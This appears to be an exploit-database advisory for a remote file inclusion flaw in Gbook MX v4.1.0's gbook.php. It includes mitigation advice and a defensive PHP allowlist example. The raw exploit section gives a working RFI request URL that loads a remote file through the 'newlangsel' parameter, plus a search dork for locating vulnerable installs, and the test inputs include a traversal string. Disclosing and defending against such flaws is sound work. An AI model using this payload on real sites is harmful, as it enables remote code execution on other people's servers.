Vendor: Gbook MX
By: indoushka
CVSS: 7,5 (HIGH)
Type: RFI
CWE: 98
Product Name: Gbook MX
Affected Version From: Gbook MX v4.1.0
Affected Version To: Gbook MX v4.1.0
Patch Exists: NO
Related CWE:
CPE: a:magtrb_soft:gbook_mx:4.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux

Gbook MX v4.1.0 Arabic Version File inclusion Vulnerability

Gbook MX v4.1.0 contains a remote file inclusion vulnerability in the `newlangsel` parameter of `gbook.php`. An attacker can exploit it by sending a crafted HTTP request to the vulnerable server in which that parameter carries a URL pointing to a malicious file hosted on a remote server. If the vulnerable server is configured to allow remote file inclusion, the malicious file will be executed on the vulnerable server.

Mitigation:

To mitigate this vulnerability, the application should be configured to include files only from trusted sources. Additionally, it should only allow the inclusion of files with specific extensions.
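
One way to implement this mitigation for a language selector such as `newlangsel`: the request value is used only as a key into a fixed allowlist of local files, and the resolved path is checked for location and extension. This is an added example, not Gbook MX's own code; the directory, language codes, file names and function names are assumptions.

```php
<?php
// Added example, not Gbook MX code. LANG_DIR, the codes and file names are assumptions.
// Defence in depth in php.ini: allow_url_include = Off (blocks include of URLs).

const LANG_DIR = __DIR__ . '/lang';        // assumed directory of language files
const LANG_ALLOWLIST = [                   // assumed codes mapped to fixed local files
    'ar' => 'arabic.php',
    'en' => 'english.php',
];
const LANG_DEFAULT = 'ar';

// Reduce the untrusted request value to a known code; it is only ever a lookup key.
function select_lang_code($requested): string
{
    // Arrays (newlangsel[]=x), URLs and paths all fail this check.
    if (!is_string($requested) || !array_key_exists($requested, LANG_ALLOWLIST)) {
        return LANG_DEFAULT;
    }
    return $requested;
}

// Map a code to a local file and verify where it really resolves to.
function resolve_lang_file($requested): string
{
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . LANG_ALLOWLIST[select_lang_code($requested)]);
    // The file must exist, sit inside LANG_DIR (no symlink escape) and end in .php.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || pathinfo($path, PATHINFO_EXTENSION) !== 'php') {
        throw new RuntimeException('language file unavailable');
    }
    return $path;
}

// Constructed inputs: a valid code, a remote URL, a traversal string, an array.
foreach (['en', 'http://127.0.0.1/c.txt?', '../../etc/passwd', ['x']] as $input) {
    echo json_encode($input), ' => ', select_lang_code($input), PHP_EOL;
}

// In the guestbook page the include would then be:
// require resolve_lang_file($_GET['newlangsel'] ?? LANG_DEFAULT);
```

Every input other than a listed code falls back to the default language, so no request value ever reaches `require` as a path or URL.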

Exploit-DB raw data:

========================================================================================                  
| # Title    : Gbook MX v4.1.0 Arabic Version File inclusion Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
| # Dork     : Powered by Gbook MX v4.1.0 ©2003 Magtrb Soft                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : RFI                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- RFI

http://server/Gbook_mx4.1.0/gbookmx/gbook.php?newlangsel=http://127.0.0.1/c.txt?

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
-------------------------------------------------------------------------------------------